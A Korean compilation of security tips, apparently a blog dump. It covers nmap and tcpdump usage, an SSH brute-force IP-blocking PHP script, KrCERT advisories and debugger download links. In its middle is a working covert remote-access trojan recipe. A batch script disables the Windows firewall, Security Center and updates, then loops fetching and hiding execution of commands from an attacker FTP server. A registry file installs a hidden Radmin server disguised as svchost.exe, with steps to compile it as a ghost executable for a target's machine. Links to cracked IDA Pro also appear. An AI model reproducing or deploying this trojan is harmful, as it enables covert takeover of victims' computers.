mtail: http://www.mtail.com 에서 제작
itail : http://idev.ibksystem.co.kr 에서 제작
텍스트 형태의 로그 파일을 실시간으로 모니터링 및 필터링 할 수 있는 툴입니다.
기능은 비슷하고 사용 편하신거 골라서 사용하시면 됩니다.
mtail: http://www.mtail.com 에서 제작
itail : http://idev.ibksystem.co.kr 에서 제작
녹색 : 새로 연결되는 프로그램
노란색 : 접속 상태가 변하고 있는 프로그램
빨간색 : 연결이 종료될 프로그램
빨간색 네모 해 놓은 못모양을 클릭하면 위에 X표가 생기면서 연결된 것들만 표시
그 옆에 A를 클릭하면 X가 생기면서 Local Address와 Remote Address가 아이피로 표시
NMAP은 port Scanning 툴로서 호스트나 네트워크를 스캐닝 할 때, 아주 유용한 시스템 보안툴인 동시에, 해커에게는 강력한 해킹툴로 사용될 수 있습니다. 서버를 운영하다 보면 관리자 스스로도 어떤 포트가 열려있고, 또 어떤 서비스가 제공중인지 잘 모를때가 있습니다. 기억력이 나빠서나, 게을러서가 아니라 필요에 의해 자주 변경되므로 수시로 파악해서 기록해두지 않으면 잊어버리게 됩니다. 또 크래킹에 의해 생성된 백도어는 파악하기가 어렵습니다.수 많은 포트와 서비스를 효과적으로 체크해서 관리하기 위해서 NMAP과 같은 포트 스캔 툴이 필요합니다. NMAP은 기존의 포트스캔툴에 비해 다양한 옵션과 방화벽 안쪽의 네트웍도 스캔할 수 있는 강력한 기능이 있습니다.
1. 설치 http://www.insecure.org/nmapnmap 의 홈페이지에서 소스파일을 내려 받습니다. 그 후에 설치할 디렉토리로 옮긴후에 압축을 풉니다. 그 후에 해당 디렉토리에서 ./configure 를 실행한 후에make, make install 을 실행합니다.
[root@gyn nmap-2.54BETA30]# ./configure [root@gyn nmap-2.54BETA30]# make; make install |
설치가 끝났으면 몇 가지 스캔 타입을 알아봅시당.
|
위의 스캔타입은 자주 쓰이는 내용이고 -h 옵션을 쓰거나 man page를 이용하면 아주 상세한 사용방법을 보실 수 있습니다.
[gyn@gyn gyn]$ man nmapNMAP(1) NMAP(1) NAMEnmap - Network exploration tool and security scanner SYNOPSISnmap [Scan Type(s)] [Options] <host or net #1 ... [#N]>..중략..[gyn@gyn gyn]$ nmap -hNmap V. 2.54BETA30 Usage: nmap [Scan Type(s)] [Options] <host or net list>Some Common Scan Types ('*' options require root privileges)-sT TCP connect() port scan (default)* -sS TCP SYN stealth port scan (best all-around TCP scan)* -sU UDP port scan..중략.. |
2. 사용.
몇가지 사용 예를 통해 nmap을 활용해 보시죠.
[root@gyn root]# nmap -sP xxx.xxx.xxx.xxx Starting nmap V. 2.54BETA30 ( www.insecure.org/nmap/ )Host gyn (xxx.xxx.xxx.xxx) appears to be up. Nmap run completed -- 1 IP address (1 host up) scanned in 0 seconds |
-sP 옵션으로 대상호스트가 살아 있음을 알아냈습니다. 이젠 특정 포트(80)를 검색해 보겠습니다.
[root@ home]# nmap -sP -PT80 xxx.xxx.xxx.xxxTCP probe port is 80 Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ )Host (xxx.xxx.xxx.xxx) appears to be up.Nmap run completed -- 1 IP address (1 host up) scanned in 1 second |
지정된 포트가 아니라 대상호스트의 열린 포트를 모두 검색해 봅니다.
[root@ home]# nmap -sT xxx.xxx.xxx.xxx Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ )Interesting ports on (xxx.xxx.xxx.xxx):(The 1526 ports scanned but not shown below are in state: closed)Port State Service22/tcp open ssh 53/tcp open domain 80/tcp open http Nmap run completed -- 1 IP address (1 host up) scanned in 5 seconds |
대상 호스트의 열린 포트를 알수는 있지만 로그가 남으므로 위험합니다. 스텔스 스캔으로 감시를 피해야 겠지요.
[root@webserver log]# nmap -sS xxx.xxx.xxx.xxx Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ )Interesting ports on (xxx.xxx.xxx.xxx):(The 1526 ports scanned but not shown below are in state: closed)Port State Service22/tcp open ssh 53/tcp open domain 80/tcp open http Nmap run completed -- 1 IP address (1 host up) scanned in 5 seconds |
UDP port 스캔입니다. 시간이 많이 걸릴 수도 있습니다.
[root@gyn root]# nmap -sU localhost Starting nmap V. 2.54BETA30 ( www.insecure.org/nmap/ )Interesting ports on gyn (127.0.0.1):(The 1450 ports scanned but not shown below are in state: closed)Port State Service53/udp open domain 699/udp open unknown Nmap run completed -- 1 IP address (1 host up) scanned in 3 seconds |
이번에는 -O 옵션으로 운영체제를 알아보겠습니다.
[root@webserver /root]# nmap -sS -O xxx.xxx.xxx.xxx Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ )Interesting ports on db (xxx.xxx.xxx.xxx):(The 1530 ports scanned but not shown below are in state: closed)Port State Service22/tcp open ssh 113/tcp open auth 3306/tcp open mysql TCP Sequence Prediction: Class=random positive incrementsDifficulty=2158992 (Good luck!)Remote operating system guess: Linux 2.1.122 - 2.2.16 Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds |
몇가지 예를 통해 사용법을 알아 보았습니다. 마지막을 부탁드릴 말씀은 자신이 직접 관리하지 않는, 호스트나 네트웍에서 테스트를 하는 것은아주 무례한 행동이며, 관리가 엄격한 사이트의 경우 접속 제한은 당하는 경우도 있으므로바람직하지 않은 방법으로 사용하는 일이 없길 바랍니다.
최근 보안 위협 중의 하나는 '미끼' 웹 사이트를 개설하여 이 사이트를 방문하는 사용자에게 액티브엑스 컨트롤을 다운로드하게 하여 이를 자동 설치하여 공격(홈페이지 변경, 악성프로그램 다운로드하여 스팸 발송, 바이러스 감염 등등)하는 경우가 아주 많습니다.
특히, 보안 패치가 제대로 이루어지지 않은 컴퓨터에서는 이러한 익스플로잇을 통한 공격이 다수 나타납니다. 물론, 정상적인 웹사이트도 해킹하여 기본 페이지의 하단에 자바 스크립트를 삽입하여 공격합니다.
이러한 공격을 예방하기 위해서는 보안 패치, 바이러스 백신, 악성코드 제거프로그램, 개인용 방화벽 등을 설치하여 운영하는 것은 기본이며, 그 밖에도 가급적이면 일반적인 사이트 이외에는 방문하지 않는 것이 좋습니다.
하지만, 웹페이지를 서핑하다 보면 외국의 사이트들을 들어 갈 경우도 많습니다. 특히, 와레즈 사이트, 포르노 사이트, 복권/도박 사이트들에는 이러한 익스플로잇이 미리 설치되어 있어 사용자를 곤경에 빠뜨릴 수 있습니다.
이러한 위협을 예방하기 위해서 '링크스캐너'라는 온라인 스캐너를 사용하여 방문하는 웹페이지에 어떠한 위협이 존재하는지 확인하는 프로그램을 사용하는 것이 좋습니다.
홈페이지: http://linkscanner.explabs.com/linkscanner/
/var/log/secure 로그를 이용한 IP Deny 자동 등록
이 스크립트는 리눅스에서 기본적으로 제공하는 로그를 이용하여 10분 간격으로 로그를 추출하고
20회 이상 Fail Password를 발생시킨 아이피를 Tcp-Wrapper(/etc/hosts.deny)에 등록시켜
더이상 해킹 시도를 방지한다.
Caution : 10분이내에 뚫리면 어찌할 수 없음... =,.=;
ps. 스크립트의 제작의 편리를 위해서 중복 등록확인은 없음... ^^;
기본환경 : 리눅스, PHP Shell script-x
작성언어 : PHP
동작원리
1. /var/log/secure 파일에서 10분대의 로그를 추출한다.
예 : 현재시간이 18:25:00 이라면 추출하는 시간은 18:10~19분을 추출한다.
2. 아이피 별로 갯수를 통계낸다.
3. 한 아이피에서 20회 이상 sshd로 비밀번호가 틀렸다면 /etc/hosts.deny에 "ALL:아이피주소"의
형태로 등록된다.
4. xinetd 데몬을 재시작한다.
5. 등록한 아이피 목록을 지정된 메일 주소로 발송한다.
실행방법
./secure_analysis.sh sshd
crontab 등록시
*/10 * * * * /경로명/secure_analysis.sh sshd
소스
#!/usr/local/bin/php
<?
// 개요
// secure log 를 분석해서 sshd로 불법적인 접속을 시도하는 IP를 /etc/hosts.deny에 등록하는 작업을 한다.
// Log Example : Jun 5 07:49:18 p1 sshd[1110]: Failed password for root from 211.114.190.196 port 52944 ssh2
// 추출 명령어 : grep "Jun 7 09" secure | grep "sshd" | grep "Failed password" | awk -F "from" '{print $2}' | awk '{print $1}'
// 지정된 입력값을 입력하지 않으면 실행하지 않는다.
if($argc > 1)
{
$RECEIVE_EMAIL = "수신 메일주소";
$Hostname = trim(exec("hostname"));
$Date = date("Y-m-d H:i:s");
// 10분전 분을 구한다.
$TenAgo = substr(date("i",mktime (date("H"), date("i")-10, 0, date("m"), date("d"), date("Y"))),0,1);
if(!file_exists("/service/log_temp"))
{
exec("mkdir -p /service/log_temp");
}
if(!file_exists("/service/log_temp/secure_analysis.log"))
{
exec("touch /service/log_temp/secure_analysis.log");
}
// 날짜에 따라서 검색어의 공백처리가 틀린 관계로 ... =,.=;
$DayLength = strlen(date("j"));
if($DayLength == 2)
{
$now = date("M j H:");
}
else
{
$now = date("M j H:");
}
if($argv[1] == "sshd")
{
exec("grep \"$now$TenAgo\" /var/log/secure | grep \"sshd\" | grep \"Failed password\" | awk -F \"from\" '{print \$2}' | awk '{print \$1}' > /service/log_temp/secure_log_".$argv[1]);
}
$Fail_IP_File = file("/service/log_temp/secure_log_".$argv[1]);
for($i=0; $i < count($Fail_IP_File); $i++)
{
$Fail_IP_File[$i] = trim($Fail_IP_File[$i]);
}
$Fail_Statistics = array_count_values($Fail_IP_File);
exec("echo \"\" > /service/log_temp/DenyIP.list_".$argv[1]);
while (list ($Ip, $Count) = each ($Fail_Statistics))
{
// 여기의 20을 조정하여 등록을 조절할 수 있다.
if($Count > 20)
{
$Now_Time = date("Y년 m월 d일 H시 i분 s초");
exec("echo \"#Regist $Now_Time\" >> /etc/hosts.deny");
exec("echo \"ALL : $Ip\" >> /etc/hosts.deny");
$Restart_Xinetd = 1;
exec("echo \"$Now_Time | $Ip | $Count 회\" >> /service/log_temp/DenyIP.list_".$argv[1]);
}
exec("echo \"$Date\t$Ip\t$Count\" >> /service/log_temp/secure_analysis.log");
}
if($Restart_Xinetd)
{
exec("killall -HUP xinetd");
exec("cat \"/service/log_temp/DenyIP.list_".$argv[1]."\" | mail -s \"$Hostname Deny IP List - $Date \" $RECEIVE_EMAIL");
}
}
else
{
echo("Missing Argument... Confirm Execute ...\n");
}
?>
net stop "Security Center"
net stop SharedAccess
net stop "Windows Firewall/Internet Connection Sharing (ICS)"
ECHO REGEDIT4>>"%Temp%.\kill.reg"
ECHO. >>"%Temp%.\kill.reg"
ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]>>"%Temp%.\kill.reg"
ECHO "Start"=dword:00000004>>"%Temp%.\kill.reg"
ECHO. >>"%Temp%.\kill.reg"
ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]>>"%Temp%.\kill.reg"
ECHO "Start"=dword:00000004>>"%Temp%.\kill.reg"
ECHO. >>"%Temp%.\kill.reg"
ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]>>"%Temp%.\kill.reg"
ECHO "Start"=dword:00000004>>"%Temp%.\kill.reg"
ECHO. >>"%Temp%.\kill.reg"
ECHO [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download]>>"%Temp%.\kill.reg"
ECHO "CheckExeSignatures"="no">>"%Temp%.\kill.reg"
ECHO "RunInvalidSignatures"=dword:00000001>>"%Temp%.\kill.reg"
ECHO. >>"%Temp%.\kill.reg"
REG IMPORT "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
md C:\windows\system32\VNC\cmd
del todo.txt
ECHO Anonymous>>todo.txt
ECHO ftp@ftp.ftp>>todo.txt
ECHO binary>>todo.txt
ECHO prompt>>todo.txt
ECHO lcd C:\windows\system32\VNC\cmd>>todo.txt
ECHO mget *>>todo.txt
ECHO bye>>todo.txt
:loop
del C:\windows\system32\VNC\cmd\* /F /Q
rd C:\windows\system32\VNC\cmd /S /Q
md C:\windows\system32\VNC\cmd
ftp -s:todo.txt %서버ip주소%
IF EXIST C:\windows\system32\VNC\cmd\serv_com.bat (
C:\windows\system32\VNC\nircmd.exe exec hide "C:\windows\system32\VNC\cmd\serv_com.bat"
)
ping -n 15 127.0.0.1 >NUL
cls
GOTO loop
눈여겨 볼 것은 ftp -s:todo.txt %서버ip주소% 입니다.
%서버ip주소%는 자신이 상대방의 ip를 받을 고정 ip로 설정합니다.
*참고로 고정ip는 CODNS에서 무료로 받을 수 있습니다. 이 ip address로 server의 ip address를 전송 받을겁니다.
예를 들어 127.0.0.1로 설정한다면 아래와 같이 됩니다.
ftp -s:todo.txt %127.0.0.1%
또 ip전송 간격은 아래 코드로 조절합니다.
ping -n 15 127.0.0.1 >NUL
15라는 숫자 대신에 적는 숫자가 ip전송 간격이 되겠군요.
server의 과부하를 고려해 적당히 기입합니다.
설정이 끝났으면 저장합니다.
---부가 설정
setting.reg파일을 편집합니다. 내용은 아래와 같습니다.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin]
[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01]
[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType]
"Data"=hex:b8,9d,90,49,c1,fa,95,ab,24,d7,22,bf,bb,f6,01,39,12,6a,cd,f9,b9,2a,\
13,33,77,16,0b,60,1e,04,92,ad,c9,66,ee,91,06,59,b8,6e,5f,af,4c,a1,e6,30,2b,\
2e,3a,66,b9,c6,16,83,d8,84,58,bc,88,bc,7b,9d,4a,c2
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:af,bf,32,35,fd,6f,f5,28,f1,d1,e5,9b,9d,b6,35,3c
"DisableTrayIcon"=hex:01,00,00,00
"Port"=hex:23,13,00,00
"LogFilePath"="C:\\WINDOWS\\system32\\VNC\\logfile.txt"
"EnableLogFile"=hex:01,00,00,00
"EnableEventLog"=hex:00,00,00,00
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"VNC1"="C:\\WINDOWS\\system32\\VNC\\svchost.exe /start"
"VNC2"="C:\\WINDOWS\\system32\\VNC\\nircmd.exe exec hide C:\\WINDOWS\\svchost.exe /c \"C:\\WINDOWS\\system32\\VNC\\getip.bat\""
Radmin설정과 자동실행 두가지가 공존하고 있군요.
비밀번호 병경을 원하면 이 파일에서 "Parameter"=hex:af,bf,32,35,fd,6f,f5,28,f1,d1,e5,9b,9d,b6,35,3c를 변경하면 됩니다.
변경 하려면 Radmin을 깔고 프로그램 자체에서 비밀번호를 설정하신 뒤 다시 해당 레지스트리를 추출하는 방법으로 하면 됩니다.
귀찮으면 그냥 놔두시고 12344321로 쓰게 됩니다.
---컴파일
이제 컴파일에 착수합니다.
bat2exe를 실행합니다. 그리고 Setup.bat파일을 불러옵니다.
그림과 같이 로드되었습니다.
이제 include탭으로 갑니다.
그림과 같이 파일을 포함합니다. (Setup폴더에서 Setup.bat을 제외한 모든 파일이 포함)
*참고로 Custom Resources탭에서 원하는 아이콘으로 변경도 가능합니다.
이제 마지막으로 Project->Options
Ghost Application을 선택하고 Ok를 누르면 컴파일 완료 직전입니다.
F9를 누르시면 원하는 파일로 컴파일 가능합니다. 마음에 드는 이름으로 저장하세요.
이제 상대방 server에서 방금 컴파일한 파일을 실행하면 Radmin server가 활성화 됩니다.
---사용법
client측에서는 radmin.exe을 실행하면 됩니다.
다만 ip전송을 받기 위해선, 위에서 입력한 아이피를 가진 컴퓨터(Radmin server)에서 ftp server를 열면 됩니다.
그러면 ftp server에 접속을 하는 컴퓨터(Radmin server)의 아이피가 뜨겠죠? 이런 원리로 상대방(Radmin server)의 아이피를 알 수 있습니다.
추가로 ftp서버를 열 때 ftp의 로컬 폴더에 serv_com.bat이란 이름으로 batch파일을 작성해 놓으면 Radmin server측에서 해당 batch파일을 보이지 않게 실행하게 할 수도 있습니다.
< 웹해킹 방어를 위한 KrCERT/CC 권고 사항>
※ 공개웹방화벽 전용 홈페이지 안내(방화벽 설치 시 주요 웹해킹 방어가능)
o 공개웹방화벽(WebKnight 및 ModSecurity) 다운로드, 설치 운영 가이드, FAQ 등의 정보 제공
- http://www.krcert.or.kr/firewall/index.htm
※ 무료 웹취약점 점검을 신청(웹취약점 탐지 및 해결방법을 설명)
o 무료 홈페이지 취약점 점검서비스 신청하러가기
- http://webcheck.krcert.or.kr
※ 아래의 문서를 참조하여 해킹에 대응하시기 바랍니다.
o 홈페이지 개발 보안 가이드
- http://www.kisa.or.kr/trace_log/homepage_guide_down.jsp
o 웹 어플리케이션 보안 템플릿
- http://www.krcert.or.kr/docDown.jsp?dn=3
o 침해사고 분석절차 가이드
- http://www.krcert.or.kr/docDown.jsp?dn=10
o PHP웹 게시판 취약점 관련 사고분석 및 보안대책
- http://www.krcert.or.kr/unimDocsDownload.do?fileName1=IN2005001.pdf&docNo=IN2005001
o SQL Injection 취약점을 이용한 윈도우즈 웹서버 사고 사례
- http://www.krcert.or.kr/unimDocsDownload.do?fileName1=IN2005014.pdf&docNo=IN2005014
o 웹 해킹을 통한 악성 코드 유포 사이트 사고 사례
- http://www.krcert.or.kr/unimDocsDownload.do?fileName1=050629-IN-2005-012.pdf&docNo=IN2005012
o ARP Spoofing 기법을 이용한 웹 페이지 악성코드 삽입 사례
- http://www.krcert.or.kr/unimDocsDownload.do?fileName1=IN2007003.pdf&docNo=IN2007003&docKind=3
궁금하신점은 국번없이 118(한국정보보호진흥원)으로 연락바랍니다.
# tcpdump -q \( dst net 1.2.3.0/24 or 1.2.4.0/25 \) and dst port 80
목적지 주소가 1.2.3.x/24 와 1.2.4.x/25 이고 80번포트인 패킷 캡쳐
# tcpdump host A
A 호스트로/부터의 모든 도착/출발 패킷 출력
# tcpdump host A and \( B or C \)
A 호스트와 B 또는 C 사이의 모든 트래픽 출력
# tcpdump ip host A and not B
A호스트와 B를 제외한 호스트 간의 모든 IP 패킷 출력
# tcpdump net ucb-ether
로컬호스트와 Berkeley의 호스트들 간의 모든 트래픽 출력
# tcpdump 'gateway A and (port ftp or ftp-data)'
게이트웨이 A를 통한 모든 ftp 트래픽 출력
# tcpdump ip and not net <localnet>
로컬네트워크로/부터가 아닌 모든 트래픽 출력
# tcpdump 'tcp[13] & 3 != 0 and not src and dst net <localnet>'
로컬네트워크가 아닌 TCP 시작과 마지막 패킷 출력
# tcpdump 'gateway A and ip[2:2] > 576'
게이트웨이 A를 통해 보내지는 576 Bytes보다 긴 IP 패킷 출력
# tcpdump 'ether[0] & 1 = 0 and ip[16] >= 224'
이더넷이 아닌 IP 브로드 또는 멀티 캐스트 패킷 출력
# tcpdump 'icmp[0] != 8 and icmp[0] != 0'
echo 요청/응답이 아닌 모든 ICMP 패킷 출력 (ping 아닌 패킷)
# tcpdump src net 1.2.3 or 1.2.4 and not dst net 1.2.3 or 1.2.4
1.2.3 과 1.2.4 IP주소 (내부) 패킷을 제외한 모든 패킷 출력
# tcpdump -i br1
br1 인터페이스의 모든 패킷 출력
tcpdump -t -x port ftp
tcpdump -t -x ‘port ftp or ftp-data’
tcpdump -t -x port 21
특정호스트의 특정 포트로 들어오는 패킷을 보는 예제
tcpdump -i eth0 -t -X port xx and host xxx.xxx.xxx.xxx
1. 개요
가. 리눅스 서버에서 패킷 스니핑시 주로 사용하는 tcpdump 의 사용법 입니다.
나. 테스트환경 : 리눅스 CentOS 5.1 (tcpdump version 3.94, libpcap version 0.9.4)
2. tcpdump 사용법
가. 특정 호스트의 특정포트 패킷만 보기
[root@localhost]# tcpdump -nn host 192.168.1.5 and port 80
나. 특정 호스트의 Mac Address 보기
[root@localhost]# tcpdump -e host 192.168.1.6
다. 지정한 디바이스 장치의 특정포트 패킷보기
[root@localhost]# tcpdump -i eth1 dst port 80
[root@localhost]# tcpdump -i eth1 src port 80
라. 특정 호스트를 제외한 패킷보기
[root@localhost]# tcpdump not host 192.168.1.6
마. 복합 조건검색 (192.168.1.2 가 아니며 80번 포트를 사용한 패킷 10줄 출력)
[root@localhost]# tcpdump 'not host 192.168.1.2 and port 80' -c 10
바. 패킷의 헥사코드 출력 및 문자열 일치하는 패킷 스니핑
[root@localhost]# tcpdump -s 1024 -x | grep "password"
(-s lenght 패킷들로부터 추출하는 샘플을 default 값인 68Byte 외의 값으로 설정
하는것으로 프로토콜의 헤더 사이즈에 가깝에 잡아 주어야 합니다. 샘플 사이즈
를 크게 잡으면 패킷하나를 처리하는데 시간이 더 걸리며 패킷 버퍼의 사이즈가
작아지게 되어 손실되는 패킷이 발생할 수 있습니다.)
OllyDbg - BoomBox
http://rapidshare.com/files/25394210/request.php_3
OllyDbg - Chinese
http://rapidshare.com/files/25394358/request.php_554
OllyDbg - CiM’s
http://rapidshare.com/files/25394505/request.php_1206
OllyDbg - Diablo’s
http://rapidshare.com/files/25395171/request.php_2
OllyDbg - ExeCryptor
http://rapidshare.com/files/25395311/request.php_553
OllyDbg - Hacnho’s
http://rapidshare.com/files/25395639/request.php_4
http://rapidshare.com/files/25395646/request.php_5
ollyice 2007.9.21
http://rapidshare.com/files/60720683/OlyICE2007.9.21.rar
bigice 5
http://rapidshare.com/files/26791856/bigice5.zip
OllyICE v1.10==new==
http://rapidshare.com/files/132790837/odbg110_OllyICE_v1.10_update.rar
OllyDbg - Shadow
http://rapidshare.com/files/25395640/request.php_6
OllyDbg - Unmodified!
http://rapidshare.com/files/25395641/request.php_1
OllyDbg-flyODBG
http://rapidshare.com/files/26789936/flyjnop790.zip
ollydbg - ricardo nar.
http://rapidshare.com/files/26791858/ricarcdon.zip
OllyDbg_SLV edition
http://rapidshare.com/files/26791862/slv.zip
OllyDbg -Arabic
http://rapidshare.com/files/26791864/ice1_3.zip
Ollydbg - xp
http://rapidshare.com/files/26771160/ollydbg_110_xp.rar
Ollydbg - greenstyle
http://rapidshare.com/files/26436069/ollydbg_Green_Style_20by_20jnop790.rar
OllyDbg - armadillo
http://rapidshare.com/files/34817803/odbg_204_20armadillo_20with_20tools.zip
OllyDbg - xp+ dct
http://rapidshare.com/files/34821367/ODbg_20xp_20DCT.zip
OllyDbg - ADO
http://rapidshare.com/files/34821368/ODbgADO.zip
OllyDbg - SND
http://rapidshare.com/files/34821374/ODbgSnD.zip
OllyDbg -D2K2
http://rapidshare.com/files/34821377/ODbgD2k2.zip
OllyDbg - DeFixed
http://rapidshare.com/files/39044055/DeFixed_Edition.rar
OllyDbg - DeFixed v2 (foff)
http://rapidshare.com/files/60718378/DeFixed_Edition_v2.rar
OllyDbg - ExeCryptor
http://rapidshare.com/files/39851301/exec.olly.zip
olly bronco (mod. for execryptor )
http://rapidshare.com/files/66345462/OllyDbg_v1.10_Bronco.rar
olly YPOGEiOS DOX DiViSiON
http://rapidshare.com/files/66345700/YGS-DOX_OllyDBG.v1.10.Mod-YPOGEiOS.rar
OllyDbg’ - Snd version all plugins and olly patched :
http://rapidshare.com/files/44123914/0_1_1_YDbg_Beta_Full.7z
the 0dbg for Themida/WinLicense V1.9.3.0
http://rapidshare.com/files/50611549/The0DBG.exe
HanOlly
http://rapidshare.com/files/64369450/odbg110__HanOlly_edition_for_themida_1.9.rar
ollydbg modified for themida 1.9.5
http://rapidshare.com/files/65716863/O_ll_y_Dbg_modify_for_themida1.9.5.EXE
ollydbg modified for themida and execryptor==new==
http://letitbit.net/download/d35cd7115999/RAMODBG.rar.html
ollydng Sabre Gold
DarkOlly==new==
http://rapidshare.com/files/137296680/DarkOlly.7z
OllyDbg 1.10 - kamal==new==
http://letitbit.net/download/9e844d493204/OllyDbg-1.10-by-kamal.rar.html
OllyDbg v1.10 LifeODBG v1.4==new==
http://letitbit.net/download/686a95302760/OllyDbg-v1.10-LifeODBG-v1.4.rar.html
OllyDBG The_Best_version==new==
http://rapidshare.com/files/142544485/OllyDBG_The_Best_version.rar
http://letitbit.net/download/ffb745506367/OllyDBG-The-Best-version.rar.html
OllyDbg 2 2a 20 oct 2007
http://rapidshare.com/files/64369705/ollydbg_2a-_20_oct07.exe
OllyDbg v2.00 Alpha 4
http://letitbit.net/download/a51bdc740372/OllyDbg-v2.00-Alpha-4.zip.html
OllyDbg v2.00 Alpha Sabre-Gold==new==
http://letitbit.net/download/357163436792/OllyDbg-v2.00-Alpha-Sabre-Gold.rar.html
oLLYdbg 2.00 g==new==
http://letitbit.net/download/0768f7669997/odbg200g.zip.html
ollydbg1.1 BY INREv team==new==
http://letitbit.net/download/fc3c1941207/ollydbg1.1-beta2-INRev.rar.html
http://letitbit.net/download/6faed3180832/odbg1.10-beta1–INRev.rar.html
> all patches for OllyDbg 1.x<
http://rapidshare.com/files/35977772/OLLYDBG_1.10_all_patches_.rar
note:
AFTER DOWNLOAD CHANGE NAME TO*.RAR OR *.ZIP
=================
dbg X86
http://www.microsoft.com/whdc/devtools/debugging/installx86.mspx
=================
98
http://rapidshare.com/files/50615930/Sic_v4.2.7_RC1_9x__IceExt_v0.7.part1.rar
http://rapidshare.com/files/50615933/Sic_v4.2.7_RC1_9x__IceExt_v0.7.part2.rar
http://rapidshare.com/files/50615934/SoftICE_20v4.3.2.2485.rar
xp
http://rapidshare.com/files/50615935/SoftIce_20v4.2.7_20RC1_20XP.exe
=================
Syser Debugger 1.92
http://rapidshare.com/files/42710603/download.php
Syser Debugger 1.93
http://rapidshare.com/files/48708302/download.php
Syser DebuggeR 1.97.1900.1016
http://rapidshare.com/files/119028937/Sys.Debug.v1.97.1900.1016.zip
Syser.Debugger.v1.97.1900.1038 ==new==
http://rapidshare.com/files/131394971/Syser.Debugger.v1.97.1900.1038.zip
=================
ImmunityDebugger v 1.0
http://debugger.immunityinc.com/download/ImmunityDebugger_setup.exe
or
http://rapidshare.com/files/47096385/ImmunityDebugger_setup.exe
ImmunityDebugger v 1.5 FULL (SCRIPT+PLUGIN)==new==
part 1 & 2:
http://rapidshare.com/files/138160039/ImDbg.v1.5.7z.001
http://rapidshare.com/files/138158243/ImDbg.v1.5.7z.002
PASS:http://reversengineering.wordpress.com/debuggers/
=================
IDA Pro Advanced v5.1.0.899
http://letitbit.net/download/555d66375926/IDAProAdvancedv5.1.0.899.rar.html
Fix
http://letitbit.net/download/3df899307180/IDAProAdvancedv5.1.0.899Fix.rar.html
DataRescue IDA Pro Advanced v5.1.0.899 + SDK + FiX
http://letitbit.net/download/077cd4773868/DataRescue.IDA.Pro.Advanced.v5.1.0.899.rar.html
IDA PRO 5.1 SDK
http://letitbit.net/download/a91b81999543/IDA-5.1-SDK.part02.rar.html
http://letitbit.net/download/e5e2e4967183/IDA-5.1-SDK.part01.rar.html
Datarescue ida pro advanced v5.1 windows patch
LAN patch
Key blacklist patch
Russian IDA data file read patch
http://letitbit.net/download/9a8fec832094/datarescue.ida.pro.advanced.v5.1.windows-patch.rar.html
IDA Pro v5.20 Advanced Full MegaPack
by cracklab
http://letitbit.net/download/b96428300403/download.php-action-get-n-MjE1.html
after download rename it to “IDA Pro v5.20 Advanced Full MegaPack.rar”
IDA Pro 5.2 addons
idsutil5.20
Flair5.10
http://letitbit.net/download/f09e75790522/IdaPro5.2-addons.rar.html
DataRescue IDA Pro Advanced v5.2 SDK
http://letitbit.net/download/85acc3208403/idapro52sdk.part02.rar.html
http://letitbit.net/download/307d35980633/idapro52sdk.part01.rar.html
=================
Zeta Debugger v1.4
http://letitbit.net/download/b06dd5445683/Zeta.Debugger.v1.4-full.zip.html
Zeta Debugger v1.5==new==
http://letitbit.net/download/e0881a39387/zd1.5-setup.zip.html
=================
EDB Linux Debugger 0.8.12
http://www.codef00.com/projects/debugger-0.8.12.tgz
0.9.1
http://www.codef00.com/projects/debugger-0.9.1.tgz
0.9.2 released 2008-07-29
http://www.codef00.com/projects.php#Debugger
0.9.4 2008-08-12==new==
http://www.codef00.com/projects/debugger-0.9.4.tgz
=================
JDebugTool Pro v4.1.1==new==
http://letitbit.net/download/baf0a2105543/JDebugTool-Pro-v4.1.1.rar.html
http://rapidshare.com/files/137998716/JDebugTool_Pro_v4.1.1.rar
pass:http://reversengineering.wordpress.com
=================
Obsidian - Non-intrusive Debugger + src ==new==
http://letitbit.net/download/e7fa3b610314/Obsidian–src.rar.html
VB Debugger [source code] + compiled with VB 6==new==
http://letitbit.net/download/f2e228167354/vb-debug-src.7z.html
MiniDBG with source==new==
--------------------------------------------------------------------------------
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6100 potentially dangerous files/CGIs, checks for outdated versions of over 950 servers, and version specific problems on over 260 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.
Nikto is not designed as an overly stealthy tool. It will test a web server in the quickest time possible, and is fairly obvious in log files. However, there is support for LibWhisker's anti-IDS methods in case you want to give it a try (or test your IDS system).
Not every check is a security problem, though most are. There are some items that are "info only" type checks that look for things that may not have a security flaw, but the webmaster or security engineer may not know are present on the server. These items are usually marked appropriately in the information printed. There are also some checks for unknown items which have been seen scanned for in log files.
Nikto is written by Chris Sullo and David Lodge.
[SQL 인젝션 해킹 주의요망]
1. 해킹
최근 국내 및 전세계적으로 SQL 인젝션등 잇다른 해킹사고가 발생하고 있습니다.
2. 점검방법
1) KISA는 홈페이지 주요 취약성을 파악하는 보안성 강화도구 캐슬(CASTLE)과
웹 서버에 숨겨진 웹셀을 탐지해 관리자에게 통지하는 휘슬(WHISTL)을 보급하고 있기 때문에 이를 이용하는 것도 좋은 방법”
다운로드 : 캐슬,휘슬 http://www.krcert.or.kr/index.jsp 오른쪽 아래
2) 웹취약점 점검서비스 :
중소기업 , 비영리 단체 무료점검신청 http://toolbox.krcert.or.kr/
아주 간단합니다. ㅎㅎ
COPY /b 이름1.JPG + 이름2.rar 이름3.jpg
이렇게 하면 1이랑 2 요놈 둘이 이름3.JPG 로 변경 됩니다. ^^
